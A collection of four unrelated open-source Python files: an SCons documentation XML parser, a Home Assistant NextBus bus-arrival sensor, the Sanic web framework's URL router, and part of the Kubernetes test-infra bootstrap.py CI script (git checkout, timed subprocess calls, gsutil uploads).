They'll get replaced in DocBook output with appropriate tags
to indicate a new paragraph.
<example>
print "this is example code, it will be offset and indented"
</example>
</summary>
</tool>
"""
import imp
import os.path
import re
import sys
import xml.sax.handler
class Item(object):
def __init__(self, name):
self.name = name
self.sort_name = name.lower()
if self.sort_name[0] == '_':
self.sort_name = self.sort_name[1:]
self.summary = []
self.sets = None
self.uses = None
def cmp_name(self, name):
if name[0] == '_':
name = name[1:]
return name.lower()
def __cmp__(self, other):
return cmp(self.sort_name, other.sort_name)
class Builder(Item):
pass
class Function(Item):
def __init__(self, name):
super(Function, self).__init__(name)
self.arguments = []
class Tool(Item):
def __init__(self, name):
Item.__init__(self, name)
self.entity = self.name.replace('+', 'X')
class ConstructionVariable(Item):
pass
class Chunk(object):
def __init__(self, tag, body=None):
self.tag = tag
if not body:
body = []
self.body = body
def __str__(self):
body = ''.join(self.body)
return "<%s>%s</%s>\n" % (self.tag, body, self.tag)
def append(self, data):
self.body.append(data)
class Arguments(object):
def __init__(self, signature, body=None):
if not body:
body = []
self.body = body
self.signature = signature
def __str__(self):
s = ''.join(self.body).strip()
result = []
for m in re.findall('([a-zA-Z/_]+|[^a-zA-Z/_]+)', s):
if ' ' in m:
m = '"%s"' % m
result.append(m)
return ' '.join(result)
def append(self, data):
self.body.append(data)
class Summary(object):
def __init__(self):
self.body = []
self.collect = []
def append(self, data):
self.collect.append(data)
def end_para(self):
text = ''.join(self.collect)
paras = text.split('\n\n')
if paras == ['\n']:
return
if paras[0] == '':
self.body.append('\n')
paras = paras[1:]
paras[0] = '\n' + paras[0]
if paras[-1] == '':
paras = paras[:-1]
paras[-1] = paras[-1] + '\n'
last = '\n'
else:
last = None
sep = None
for p in paras:
c = Chunk("para", p)
if sep:
self.body.append(sep)
self.body.append(c)
sep = '\n'
if last:
self.body.append(last)
def begin_chunk(self, chunk):
self.end_para()
self.collect = chunk
def end_chunk(self):
self.body.append(self.collect)
self.collect = []
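# Illustrative sketch (not part of the original module): Summary treats blank
# lines as paragraph separators, wrapping each paragraph in a <para> chunk as
# described in the module docstring.
def _summary_example():  # pragma: no cover
    s = Summary()
    s.append('\nFirst paragraph.\n\nSecond paragraph.\n')
    s.end_para()
    # s.body now holds one Chunk("para", ...) per paragraph, plus newline
    # separators; str() on a Chunk renders "<para>...</para>".
    return [str(piece) for piece in s.body]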
class SConsDocHandler(xml.sax.handler.ContentHandler,
xml.sax.handler.ErrorHandler):
def __init__(self):
self._start_dispatch = {}
self._end_dispatch = {}
keys = list(self.__class__.__dict__.keys())
start_tag_method_names = [k for k in keys if k[:6] == 'start_']
end_tag_method_names = [k for k in keys if k[:4] == 'end_']
for method_name in start_tag_method_names:
tag = method_name[6:]
self._start_dispatch[tag] = getattr(self, method_name)
for method_name in end_tag_method_names:
tag = method_name[4:]
self._end_dispatch[tag] = getattr(self, method_name)
self.stack = []
self.collect = []
self.current_object = []
self.builders = {}
self.functions = {}
self.tools = {}
self.cvars = {}
def startElement(self, name, attrs):
try:
start_element_method = self._start_dispatch[name]
except KeyError:
self.characters('<%s>' % name)
else:
start_element_method(attrs)
def endElement(self, name):
try:
end_element_method = self._end_dispatch[name]
except KeyError:
self.characters('</%s>' % name)
else:
end_element_method()
#
#
def characters(self, chars):
self.collect.append(chars)
def begin_collecting(self, chunk):
self.collect = chunk
def end_collecting(self):
self.collect = []
def begin_chunk(self):
pass
def end_chunk(self):
pass
#
#
#
def begin_xxx(self, obj):
self.stack.append(self.current_object)
self.current_object = obj
def end_xxx(self):
self.current_object = self.stack.pop()
#
#
#
def start_scons_doc(self, attrs):
pass
def end_scons_doc(self):
pass
def start_builder(self, attrs):
name = attrs.get('name')
try:
builder = self.builders[name]
except KeyError:
builder = Builder(name)
self.builders[name] = builder
self.begin_xxx(builder)
def end_builder(self):
self.end_xxx()
def start_scons_function(self, attrs):
name = attrs.get('name')
try:
function = self.functions[name]
except KeyError:
function = Function(name)
self.functions[name] = function
self.begin_xxx(function)
def end_scons_function(self):
self.end_xxx()
def start_tool(self, attrs):
name = attrs.get('name')
try:
tool = self.tools[name]
except KeyError:
tool = Tool(name)
self.tools[name] = tool
self.begin_xxx(tool)
def end_tool(self):
self.end_xxx()
def start_cvar(self, attrs):
name = attrs.get('name')
try:
cvar = self.cvars[name]
except KeyError:
cvar = ConstructionVariable(name)
self.cvars[name] = cvar
self.begin_xxx(cvar)
def end_cvar(self):
self.end_xxx()
def start_arguments(self, attrs):
arguments = Arguments(attrs.get('signature', "both"))
self.current_object.arguments.append(arguments)
self.begin_xxx(arguments)
self.begin_collecting(arguments)
def end_arguments(self):
self.end_xxx()
def start_summary(self, attrs):
summary = Summary()
self.current_object.summary = summary
self.begin_xxx(summary)
self.begin_collecting(summary)
def end_summary(self):
self.current_object.end_para()
self.end_xxx()
def start_example(self, attrs):
example = Chunk("programlisting")
self.current_object.begin_chunk(example)
def end_example(self):
self.current_object.end_chunk()
def start_uses(self, attrs):
self.begin_collecting([])
def end_uses(self):
self.current_object.uses = sorted(''.join(self.collect).split())
self.end_collecting()
def start_sets(self, attrs):
self.begin_collecting([])
def end_sets(self):
self.current_object.sets = sorted(''.join(self.collect).split())
self.end_collecting()
# Stuff for the ErrorHandler portion.
def error(self, exception):
linenum = exception._linenum - self.preamble_lines
sys.stderr.write('%s:%d:%d: %s (error)\n' % (self.filename, linenum, exception._colnum, ''.join(exception.args)))
def fatalError(self, exception):
linenum = exception._linenum - self.preamble_lines
sys.stderr.write('%s:%d:%d: %s (fatalError)\n' % (self.filename, linenum, exception._colnum, ''.join(exception.args)))
def set_file_info(self, filename, preamble_lines):
self.filename = filename
self.preamble_lines = preamble_lines
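# Illustrative sketch (not part of the original module): wiring SConsDocHandler
# into the standard xml.sax parser. set_file_info() exists so callers can
# correct error line numbers for any preamble they prepend; 0 is used here
# because this sketch feeds the document as-is.
def _example_parse(xml_string, filename='<string>'):  # pragma: no cover
    parser = xml.sax.make_parser()
    handler = SConsDocHandler()
    handler.set_file_info(filename, 0)
    parser.setContentHandler(handler)
    parser.setErrorHandler(handler)
    parser.feed(xml_string)
    parser.close()
    return handler.builders, handler.functions, handler.tools, handler.cvars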
# lifted from Ka-Ping Yee's way cool pydoc module.
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
    except ImportError as e:
sys.stderr.write("Could not import %s: %s\n" % (path, e))
return None
file.close()
return module
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
|
"""NextBus sensor."""
from itertools import chain
import logging
from py_nextbus import NextBusClient
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, DEVICE_CLASS_TIMESTAMP
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util.dt import utc_from_timestamp
_LOGGER = logging.getLogger(__name__)
DOMAIN = "nextbus"
CONF_AGENCY = "agency"
CONF_ROUTE = "route"
CONF_STOP = "stop"
ICON = "mdi:bus"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_AGENCY): cv.string,
vol.Required(CONF_ROUTE): cv.string,
vol.Required(CONF_STOP): cv.string,
vol.Optional(CONF_NAME): cv.string,
}
)
def listify(maybe_list):
"""Return list version of whatever value is passed in.
This is used to provide a consistent way of interacting with the JSON
    results from the API. There are several attributes that will either be
    missing if there are no values, be a single dictionary if there is only one
    value, or be a list if there are multiple.
"""
if maybe_list is None:
return []
if isinstance(maybe_list, list):
return maybe_list
return [maybe_list]
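# Illustrative behaviour of listify (derived from the logic above):
#     listify(None)          -> []
#     listify({"tag": "x"})  -> [{"tag": "x"}]
#     listify([1, 2, 3])     -> [1, 2, 3]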
def maybe_first(maybe_list):
"""Return the first item out of a list or returns back the input."""
if isinstance(maybe_list, list) and maybe_list:
return maybe_list[0]
return maybe_list
def validate_value(value_name, value, value_list):
"""Validate tag value is in the list of items and logs error if not."""
valid_values = {v["tag"]: v["title"] for v in value_list}
if value not in valid_values:
_LOGGER.error(
"Invalid %s tag `%s`. Please use one of the following: %s",
value_name,
value,
", ".join(f"{title}: {tag}" for tag, title in valid_values.items()),
)
return False
return True
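# For example, with value_list == [{"tag": "sf-muni", "title": "SF Muni"}],
# validate_value("agency", "sf-muni", value_list) returns True; an unknown tag
# returns False and logs the valid "title: tag" pairs.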
def validate_tags(client, agency, route, stop):
"""Validate provided tags."""
# Validate agencies
if not validate_value("agency", agency, client.get_agency_list()["agency"]):
return False
# Validate the route
if not validate_value("route", route, client.get_route_list(agency)["route"]):
return False
# Validate the stop
route_config = client.get_route_config(route, agency)["route"]
if not validate_value("stop", stop, route_config["stop"]):
return False
return True
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Load values from configuration and initialize the platform."""
agency = config[CONF_AGENCY]
route = config[CONF_ROUTE]
stop = config[CONF_STOP]
name = config.get(CONF_NAME)
client = NextBusClient(output_format="json")
    # Ensure that the provided tags are valid; validate_tags logs the valid values on failure
if not validate_tags(client, agency, route, stop):
_LOGGER.error("Invalid config value(s)")
return
add_entities([NextBusDepartureSensor(client, agency, route, stop, name)], True)
class NextBusDepartureSensor(Entity):
"""Sensor class that displays upcoming NextBus times.
To function, this requires knowing the agency tag as well as the tags for
both the route and the stop.
This is possibly a little convoluted to provide as it requires making a
    request to the service to get these values. Perhaps it can be simplified in
the future using fuzzy logic and matching.
"""
def __init__(self, client, agency, route, stop, name=None):
"""Initialize sensor with all required config."""
self.agency = agency
self.route = route
self.stop = stop
self._custom_name = name
        # Maybe pull a more user-friendly name from the API here
self._name = f"{agency} {route}"
self._client = client
# set up default state attributes
self._state = None
self._attributes = {}
def _log_debug(self, message, *args):
"""Log debug message with prefix."""
_LOGGER.debug(":".join((self.agency, self.route, self.stop, message)), *args)
@property
def name(self):
"""Return sensor name.
Uses an auto generated name based on the data from the API unless a
custom name is provided in the configuration.
"""
if self._custom_name:
return self._custom_name
return self._name
@property
def device_class(self):
"""Return the device class."""
return DEVICE_CLASS_TIMESTAMP
@property
def state(self):
"""Return current state of the sensor."""
return self._state
@property
def device_state_attributes(self):
"""Return additional state attributes."""
return self._attributes
@property
def icon(self):
"""Return icon to be used for this sensor."""
# Would be nice if we could determine if the line is a train or bus
# however that doesn't seem to be available to us. Using bus for now.
return ICON
def update(self):
"""Update sensor with new departures times."""
# Note: using Multi because there is a bug with the single stop impl
results = self._client.get_predictions_for_multi_stops(
[{"stop_tag": self.stop, "route_tag": self.route}], self.agency
)
self._log_debug("Predictions results: %s", results)
if "Error" in results:
self._log_debug("Could not get predictions: %s", results)
if not results.get("predictions"):
self._log_debug("No predictions available")
self._state = None
# Remove attributes that may now be outdated
self._attributes.pop("upcoming", None)
return
results = results["predictions"]
# Set detailed attributes
self._attributes.update(
{
"agency": results.get("agencyTitle"),
"route": results.get("routeTitle"),
"stop": results.get("stopTitle"),
}
)
# List all messages in the attributes
messages = listify(results.get("message", []))
self._log_debug("Messages: %s", messages)
self._attributes["message"] = " -- ".join(
message.get("text", "") for message in messages
)
# List out all directions in the attributes
directions = listify(results.get("direction", []))
self._attributes["direction"] = ", ".join(
direction.get("title", "") for direction in directions
)
# Chain all predictions together
predictions = list(
chain(
*(listify(direction.get("prediction", [])) for direction in directions)
)
)
# Short circuit if we don't have any actual bus predictions
if not predictions:
self._log_debug("No upcoming predictions available")
self._state = None
self._attributes["upcoming"] = "No upcoming predictions"
return
# Generate list of upcoming times
self._attributes["upcoming"] = ", ".join(
sorted(p["minutes"] for p in predictions)
)
latest_prediction = maybe_first(predictions)
self._state = utc_from_timestamp(
int(latest_prediction["epochTime"]) / 1000
).isoformat()
|
|
import re
from collections import defaultdict, namedtuple
from collections.abc import Iterable
from functools import lru_cache
from sanic.exceptions import NotFound, InvalidUsage
from sanic.views import CompositionView
Route = namedtuple(
'Route',
['handler', 'methods', 'pattern', 'parameters', 'name'])
Parameter = namedtuple('Parameter', ['name', 'cast'])
REGEX_TYPES = {
'string': (str, r'[^/]+'),
'int': (int, r'\d+'),
'number': (float, r'[0-9\\.]+'),
'alpha': (str, r'[A-Za-z]+'),
}
ROUTER_CACHE_SIZE = 1024
def url_hash(url):
return url.count('/')
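# url_hash buckets dynamic routes by their number of path segments, e.g.
# url_hash('/api/v1/users/<id>') == 4, so matching only needs to scan routes
# with the same slash count.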
class RouteExists(Exception):
pass
class RouteDoesNotExist(Exception):
pass
class Router:
"""Router supports basic routing with parameters and method checks
Usage:
.. code-block:: python
@sanic.route('/my/url/<my_param>', methods=['GET', 'POST', ...])
def my_route(request, my_param):
do stuff...
or
.. code-block:: python
        @sanic.route('/my/url/<my_param:my_type>', methods=['GET', 'POST', ...])
def my_route_with_type(request, my_param: my_type):
do stuff...
Parameters will be passed as keyword arguments to the request handling
function. Provided parameters can also have a type by appending :type to
    the <parameter>. The given parameter must be castable to this type.
If no type is provided, a string is expected. A regular expression can
    also be passed in as the type. The argument passed to the handler is cast
    to the declared type (regex and string types are passed through as strings).
"""
routes_static = None
routes_dynamic = None
routes_always_check = None
parameter_pattern = re.compile(r'<(.+?)>')
def __init__(self):
self.routes_all = {}
self.routes_static = {}
self.routes_dynamic = defaultdict(list)
self.routes_always_check = []
self.hosts = set()
def parse_parameter_string(self, parameter_string):
"""Parse a parameter string into its constituent name, type, and
pattern
For example::
            parse_parameter_string('param_one:[A-z]') ->
('param_one', str, '[A-z]')
:param parameter_string: String to parse
:return: tuple containing
(parameter_name, parameter_type, parameter_pattern)
"""
# We could receive NAME or NAME:PATTERN
name = parameter_string
pattern = 'string'
if ':' in parameter_string:
name, pattern = parameter_string.split(':', 1)
default = (str, pattern)
# Pull from pre-configured types
_type, pattern = REGEX_TYPES.get(pattern, default)
return name, _type, pattern
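    # For example, parse_parameter_string('user_id:int') returns
    # ('user_id', int, r'\d+') via the pre-configured REGEX_TYPES entry.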
def add(self, uri, methods, handler, host=None, strict_slashes=False):
# add regular version
self._add(uri, methods, handler, host)
if strict_slashes:
return
# Add versions with and without trailing /
slash_is_missing = (
not uri[-1] == '/'
and not self.routes_all.get(uri + '/', False)
)
without_slash_is_missing = (
uri[-1] == '/'
and not self.routes_all.get(uri[:-1], False)
and not uri == '/'
)
# add version with trailing slash
if slash_is_missing:
self._add(uri + '/', methods, handler, host)
# add version without trailing slash
elif without_slash_is_missing:
self._add(uri[:-1], methods, handler, host)
def _add(self, uri, methods, handler, host=None):
"""Add a handler to the route list
:param uri: path to match
:param methods: sequence of accepted method names. If none are
provided, any method is allowed
:param handler: request handler function.
When executed, it should provide a response object.
:return: Nothing
"""
if host is not None:
if isinstance(host, str):
uri = host + uri
self.hosts.add(host)
else:
if not isinstance(host, Iterable):
raise ValueError("Expected either string or Iterable of "
"host strings, not {!r}".format(host))
for host_ in host:
self.add(uri, methods, handler, host_)
return
        # Use a frozenset for faster lookups of whether a method is allowed
if methods:
methods = frozenset(methods)
parameters = []
properties = {"unhashable": None}
def add_parameter(match):
name = match.group(1)
name, _type, pattern = self.parse_parameter_string(name)
parameter = Parameter(
name=name, cast=_type)
parameters.append(parameter)
            # Mark the route as unhashable if the parameter pattern can match
            # a '/', since url_hash (the slash count) can no longer bucket it
            if re.search('(^|[^^]){1}/', pattern):
                properties['unhashable'] = True
            # Likewise if the pattern itself matches a '/'
            elif re.search(pattern, '/'):
                properties['unhashable'] = True
return '({})'.format(pattern)
pattern_string = re.sub(self.parameter_pattern, add_parameter, uri)
pattern = re.compile(r'^{}$'.format(pattern_string))
def merge_route(route, methods, handler):
# merge to the existing route when possible.
if not route.methods or not methods:
# method-unspecified routes are not mergeable.
raise RouteExists(
"Route already registered: {}".format(uri))
elif route.methods.intersection(methods):
# already existing method is not overloadable.
duplicated = methods.intersection(route.methods)
raise RouteExists(
"Route already registered: {} [{}]".format(
uri, ','.join(list(duplicated))))
if isinstance(route.handler, CompositionView):
view = route.handler
else:
view = CompositionView()
view.add(route.methods, route.handler)
view.add(methods, handler)
route = route._replace(
handler=view, methods=methods.union(route.methods))
return route
if parameters:
# TODO: This is too complex, we need to reduce the complexity
if properties['unhashable']:
routes_to_check = self.routes_always_check
ndx, route = self.check_dynamic_route_exists(
pattern, routes_to_check)
else:
routes_to_check = self.routes_dynamic[url_hash(uri)]
ndx, route = self.check_dynamic_route_exists(
pattern, routes_to_check)
if ndx != -1:
# Pop the ndx of the route, no dups of the same route
routes_to_check.pop(ndx)
else:
route = self.routes_all.get(uri)
if route:
route = merge_route(route, methods, handler)
else:
# prefix the handler name with the blueprint name
# if available
if hasattr(handler, '__blueprintname__'):
handler_name = '{}.{}'.format(
handler.__blueprintname__, handler.__name__)
else:
handler_name = getattr(handler, '__name__', None)
route = Route(
handler=handler, methods=methods, pattern=pattern,
parameters=parameters, name=handler_name)
self.routes_all[uri] = route
if properties['unhashable']:
self.routes_always_check.append(route)
elif parameters:
self.routes_dynamic[url_hash(uri)].append(route)
else:
self.routes_static[uri] = route
@staticmethod
def check_dynamic_route_exists(pattern, routes_to_check):
for ndx, route in enumerate(routes_to_check):
if route.pattern == pattern:
return ndx, route
else:
return -1, None
def remove(self, uri, clean_cache=True, host=None):
if host is not None:
uri = host + uri
try:
route = self.routes_all.pop(uri)
except KeyError:
raise RouteDoesNotExist("Route was not registered: {}".format(uri))
if route in self.routes_always_check:
self.routes_always_check.remove(route)
elif url_hash(uri) in self.routes_dynamic \
and route in self.routes_dynamic[url_hash(uri)]:
self.routes_dynamic[url_hash(uri)].remove(route)
else:
self.routes_static.pop(uri)
if clean_cache:
self._get.cache_clear()
@lru_cache(maxsize=ROUTER_CACHE_SIZE)
def find_route_by_view_name(self, view_name):
"""Find a route in the router based on the specified view name.
:param view_name: string of view name to search by
:return: tuple containing (uri, Route)
"""
if not view_name:
return (None, None)
for uri, route in self.routes_all.items():
if route.name == view_name:
return uri, route
return (None, None)
def get(self, request):
"""Get a request handler based on the URL of the request, or raises an
error
:param request: Request object
:return: handler, arguments, keyword arguments
"""
# No virtual hosts specified; default behavior
if not self.hosts:
return self._get(request.path, request.method, '')
# virtual hosts specified; try to match route to the host header
try:
return self._get(request.path, request.method,
request.headers.get("Host", ''))
# try default hosts
except NotFound:
return self._get(request.path, request.method, '')
@lru_cache(maxsize=ROUTER_CACHE_SIZE)
def _get(self, url, method, host):
"""Get a request handler based on the URL of the request, or raises an
error. Internal method for caching.
:param url: request URL
:param method: request method
:return: handler, arguments, keyword arguments
"""
url = host + url
# Check against known static routes
route = self.routes_static.get(url)
method_not_supported = InvalidUsage(
'Method {} not allowed for URL {}'.format(
method, url), status_code=405)
if route:
if route.methods and method not in route.methods:
raise method_not_supported
match = route.pattern.match(url)
else:
route_found = False
# Move on to testing all regex routes
for route in self.routes_dynamic[url_hash(url)]:
match = route.pattern.match(url)
route_found |= match is not None
# Do early method checking
if match and method in route.methods:
break
else:
# Lastly, check against all regex routes that cannot be hashed
for route in self.routes_always_check:
match = route.pattern.match(url)
route_found |= match is not None
# Do early method checking
if match and method in route.methods:
break
else:
# Route was found but the methods didn't match
if route_found:
raise method_not_supported
raise NotFound('Requested URL {} not found'.format(url))
kwargs = {p.name: p.cast(value)
for value, p
in zip(match.groups(1), route.parameters)}
route_handler = route.handler
if hasattr(route_handler, 'handlers'):
route_handler = route_handler.handlers[method]
return route_handler, [], kwargs
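# Minimal usage sketch (hypothetical handler, for illustration only):
#
#     router = Router()
#     router.add('/users/<user_id:int>', ['GET'], lambda req, user_id: user_id)
#     handler, args, kwargs = router._get('/users/42', 'GET', '')
#     # kwargs == {'user_id': 42}; the captured value is cast via Parameter.cast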
|
|
#!/usr/bin/env python
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Need to figure out why this only fails on travis
# pylint: disable=bad-continuation
"""Bootstraps starting a test job.
The following should already be done:
git checkout http://k8s.io/test-infra
cd $WORKSPACE
test-infra/jenkins/bootstrap.py <--repo=R || --bare> <--job=J> <--pull=P || --branch=B>
The bootstrapper now does the following:
# Note start time
# read test-infra/jenkins/$JOB.json
  # check out repos defined in $JOB.json
# note job started
# call runner defined in $JOB.json
# upload artifacts (this will change later)
# upload build-log.txt
# note job ended
The contract with the runner is as follows:
* Runner must exit non-zero if job fails for any reason.
"""
import argparse
import contextlib
import json
import logging
import os
import pipes
import random
import re
import select
import signal
import socket
import subprocess
import sys
import tempfile
import time
ORIG_CWD = os.getcwd() # Checkout changes cwd
def read_all(end, stream, append):
"""Read all buffered lines from a stream."""
while not end or time.time() < end:
line = stream.readline()
if not line:
return True # Read everything
# Strip \n at the end if any. Last line of file may not have one.
append(line.rstrip('\n'))
# Is there more on the buffer?
ret = select.select([stream.fileno()], [], [], 0.1)
if not ret[0]:
return False # Cleared buffer but not at the end
return False # Time expired
def elapsed(since):
"""Return the number of minutes elapsed since a time."""
return (time.time() - since) / 60
def terminate(end, proc, kill):
"""Terminate or kill the process after end."""
if not end or time.time() <= end:
return False
if kill: # Process will not die, kill everything
pgid = os.getpgid(proc.pid)
logging.info(
'Kill %d and process group %d', proc.pid, pgid)
os.killpg(pgid, signal.SIGKILL)
proc.kill()
return True
logging.info(
'Terminate %d on timeout', proc.pid)
proc.terminate()
return True
def _call(end, cmd, stdin=None, check=True, output=None):
"""Start a subprocess."""
logging.info('Call: %s', ' '.join(pipes.quote(c) for c in cmd))
begin = time.time()
if end:
end = max(end, time.time() + 60) # Allow at least 60s per command
proc = subprocess.Popen(
cmd,
stdin=subprocess.PIPE if stdin is not None else None,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=os.setsid,
)
if stdin:
proc.stdin.write(stdin)
proc.stdin.close()
out = []
code = None
timeout = False
reads = {
proc.stderr.fileno(): (proc.stderr, logging.warning),
proc.stdout.fileno(): (
proc.stdout, (out.append if output else logging.info)),
}
while reads:
if terminate(end, proc, timeout):
if timeout: # We killed everything
break
# Give subprocess some cleanup time before killing.
end = time.time() + 15 * 60
timeout = True
ret = select.select(reads, [], [], 0.1)
for fdesc in ret[0]:
if read_all(end, *reads[fdesc]):
reads.pop(fdesc)
if not ret[0] and proc.poll() is not None:
break # process exited without closing pipes (timeout?)
code = proc.wait()
if timeout:
code = code or 124
logging.error('Build timed out')
if code:
logging.error('Build failed')
logging.info(
'process %d exited with code %d after %.1fm',
proc.pid, code, elapsed(begin))
out.append('')
lines = output and '\n'.join(out)
if check and code:
raise subprocess.CalledProcessError(code, cmd, lines)
return lines
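# Typical invocation (illustrative): run a command with a deadline and capture
# its output, e.g. _call(time.time() + 600, ['git', 'rev-parse', 'HEAD'], output=True).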
def ref_has_shas(ref):
"""Determine if a reference specifies shas (contains ':')"""
return isinstance(ref, basestring) and ':' in ref
def pull_numbers(pull):
"""Turn a pull reference list into a list of PR numbers to merge."""
if ref_has_shas(pull):
return [r.split(':')[0] for r in pull.split(',')][1:]
else:
return [str(pull)]
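# Illustrative results:
#     pull_numbers(12345)                           -> ['12345']
#     pull_numbers('master:abcd,123:ef12,456:aa11') -> ['123', '456']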
def pull_ref(pull):
"""Turn a PR number of list of refs into specific refs to fetch and check out."""
if isinstance(pull, int) or ',' not in pull:
return ['+refs/pull/%d/merge' % int(pull)], ['FETCH_HEAD']
pulls = pull.split(',')
refs = []
checkouts = []
for ref in pulls:
if ':' in ref: # master:abcd or 1234:abcd
name, sha = ref.split(':')
elif not refs: # master
name, sha = ref, 'FETCH_HEAD'
else:
name = ref
sha = 'refs/pr/%s' % ref
checkouts.append(sha)
if not refs: # First ref should be branch to merge into
refs.append(name)
else: # Subsequent refs should be PR numbers
num = int(name)
refs.append('+refs/pull/%d/head:refs/pr/%d' % (num, num))
return refs, checkouts
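# Illustrative results:
#     pull_ref(1234)  -> (['+refs/pull/1234/merge'], ['FETCH_HEAD'])
#     pull_ref('master:abcd,123:ef12')
#         -> (['master', '+refs/pull/123/head:refs/pr/123'], ['abcd', 'ef12'])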
def branch_ref(branch):
"""Split branch:sha if necessary."""
if ref_has_shas(branch):
split_refs = branch.split(':')
return [split_refs[0]], [split_refs[1]]
else:
return [branch], ['FETCH_HEAD']
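# Illustrative results:
#     branch_ref('release-1.5:abcd') -> (['release-1.5'], ['abcd'])
#     branch_ref('master')           -> (['master'], ['FETCH_HEAD'])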
def repository(repo, ssh):
"""Return the url associated with the repo."""
if repo.startswith('k8s.io/'):
repo = 'github.com/kubernetes/%s' % (repo[len('k8s.io/'):])
if ssh:
if ":" not in repo:
parts = repo.split('/', 1)
repo = '%s:%s' % (parts[0], parts[1])
return 'git@%s' % repo
return 'https://%s' % repo
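# Illustrative results:
#     repository('k8s.io/kubernetes', False) -> 'https://github.com/kubernetes/kubernetes'
#     repository('k8s.io/kubernetes', True)  -> 'git@github.com:kubernetes/kubernetes'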
def random_sleep(attempt):
"""Sleep 2**attempt seconds with a random fractional offset."""
time.sleep(random.random() + attempt ** 2)
def checkout(call, repo, branch, pull, ssh='', git_cache='', clean=False):
"""Fetch and checkout the repository at the specified branch/pull."""
# pylint: disable=too-many-locals
if bool(branch) == bool(pull):
raise ValueError('Must specify one of --branch or --pull')
if pull:
refs, checkouts = pull_ref(pull)
else:
refs, checkouts = branch_ref(branch)
git = 'git'
if git_cache:
cache_dir = '%s/%s' % (git_cache, repo)
try:
os.makedirs(cache_dir)
except OSError:
pass
call([git, 'init', repo, '--separate-git-dir=%s' % cache_dir])
call(['rm', '-f', '%s/index.lock' % cache_dir])
else:
call([git, 'init', repo])
os.chdir(repo)
if clean:
call([git, 'clean', '-dfx'])
call([git, 'reset', '--hard'])
# To make a merge commit, a user needs to be set. It's okay to use a dummy
# user here, since we're not exporting the history.
call([git, 'config', '--local', 'user.name', 'K8S Bootstrap'])
call([git, 'config', '--local', 'user.email', 'k8s_bootstrap@localhost'])
retries = 3
for attempt in range(retries):
try:
call([git, 'fetch', '--quiet', '--tags', repository(repo, ssh)] + refs)
break
except subprocess.CalledProcessError as cpe:
if attempt >= retries - 1:
raise
if cpe.returncode != 128:
raise
logging.warning('git fetch failed')
random_sleep(attempt)
call([git, 'checkout', '-B', 'test', checkouts[0]])
for ref, head in zip(refs, checkouts)[1:]:
call(['git', 'merge', '--no-ff', '-m', 'Merge %s' % ref, head])
def repos_dict(repos):
"""Returns {"repo1": "branch", "repo2": "pull"}."""
return {r: b or p for (r, (b, p)) in repos.items()}
def start(gsutil, paths, stamp, node_name, version, repos):
"""Construct and upload started.json."""
data = {
'timestamp': int(stamp),
'jenkins-node': node_name,
'node': node_name,
}
if version:
data['repo-version'] = version
data['version'] = version # TODO(fejta): retire
if repos:
pull = repos[repos.main]
if ref_has_shas(pull[1]):
data['pull'] = pull[1]
data['repos'] = repos_dict(repos)
gsutil.upload_json(paths.started, data)
# Upload a link to the build path in the directory
if paths.pr_build_link:
gsutil.upload_text(paths.pr_build_link, paths.pr_path)
class GSUtil(object):
"""A helper class for making gsutil commands."""
gsutil = 'gsutil'
def __init__(self, call):
self.call = call
def stat(self, path):
"""Return metadata about the object, such as generation."""
cmd = [self.gsutil, 'stat', path]
return self.call(cmd, output=True)
def upload_json(self, path, jdict, generation=None):
"""Upload the dictionary object to path."""
if generation is not None: # generation==0 means object does not exist
gen = ['-h', 'x-goog-if-generation-match:%s' % generation]
else:
gen = []
cmd = [
self.gsutil, '-q',
'-h', 'Content-Type:application/json'] + gen + [
'cp', '-', path]
self.call(cmd, stdin=json.dumps(jdict, indent=2))
def copy_file(self, dest, orig):
"""Copy the file to the specified path using compressed encoding."""
cmd = [self.gsutil, '-q', 'cp', '-Z', orig, dest]
self.call(cmd)
def upload_text(self, path, txt, cached=True):
"""Copy the text to path, optionally disabling caching."""
headers = ['-h', 'Content-Type:text/plain']
if not cached:
headers += ['-h', 'Cache-Control:private, max-age=0, no-transform']
cmd = [self.gsutil, '-q'] + headers + ['cp', '-', path]
self.call(cmd, stdin=txt)
def cat(self, path, generation):
"""Return contents of path#generation"""
cmd = [self.gsutil, '-q', 'cat', '%s#%s' % (path, generation)]
return self.call(cmd, output=True)
def upload_artifacts(self, path, artifacts):
"""Upload artifacts to the specified path."""
# Upload artifacts
if os.path.isdir(artifacts):
cmd = [
self.gsutil, '-m', '-q',
'-o', 'GSUtil:use_magicfile=True',
'cp', '-r', '-c', '-z', 'log,txt,xml',
artifacts, path,
]
self.call(cmd)
def append_result(gsutil, path, build, version, passed):
"""Download a json list and append metadata about this build to it."""
# TODO(fejta): delete the clone of this logic in upload-to-gcs.sh
# (this is update_job_result_cache)
end = time.time() + 300 # try for up to five minutes
errors = 0
while time.time() < end:
if errors:
random_sleep(min(errors, 3))
try:
out = gsutil.stat(path)
gen = re.search(r'Generation:\s+(\d+)', out).group(1)
except subprocess.CalledProcessError:
gen = 0
if gen:
try:
cache = json.loads(gsutil.cat(path, gen))
if not isinstance(cache, list):
raise ValueError(cache)
except ValueError as exc:
logging.warning('Failed to decode JSON: %s', exc)
cache = []
except subprocess.CalledProcessError: # gen doesn't exist
errors += 1
continue
else:
cache = []
cache.append({
'version': version, # TODO(fejta): retire
'job-version': version,
'buildnumber': build,
'passed': bool(passed),
'result': 'SUCCESS' if passed else 'FAILURE',
})
cache = cache[-300:]
try:
gsutil.upload_json(path, cache, generation=gen)
return
